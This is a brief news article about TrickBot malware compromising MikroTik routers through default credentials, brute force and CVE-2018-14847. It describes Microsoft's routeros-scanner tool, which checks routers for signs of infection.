There are different security threats that can put our routers at risk and affect their proper functioning. One of the most dangerous in recent years is TrickBot. Now Microsoft has created a tool to scan MikroTik routers to find out if they are infected by this threat or not. It is one of the most used brands, so it is a very interesting solution for many users.
Detect if your router is affected by TrickBot
TrickBot is a security threat that has been very present in recent years. It is a botnet that is normally distributed through email using Phishing tactics or through other malware that has previously infected the victim. What it does from then on is connect to a server controlled by the attacker and allow it to send malicious payloads to the infected computer.
This threat has affected a wide variety of IoT devices and also routers. It makes that attacked computer act as a proxy between the device and the attackers' server. In recent times, attackers have used TrickBot to compromise MikroTik routers.
To access them, they mainly relied on using default credentials. For this reason, it is important that you always change the access data that comes from the factory when you buy a router. They can perform brute force attacks to gain control of devices. But they have also exploited vulnerabilities like CVE-2018-14847.
The problem is that there are hundreds of thousands of MikroTik routers that are still vulnerable. For this reason, Microsoft has launched a tool called routeros-scanner with which administrators can analyze devices of this brand to find out if they are infected with TrickBot or not and be able to take action as soon as possible.
Basically what the script does is find out the version of the device and whether or not it is vulnerable to a particular failure, check scheduled tasks, traffic redirection rules, DNS cache poisoning, change in default ports, suspicious files or proxies. This will help to know if that specific team is in danger.
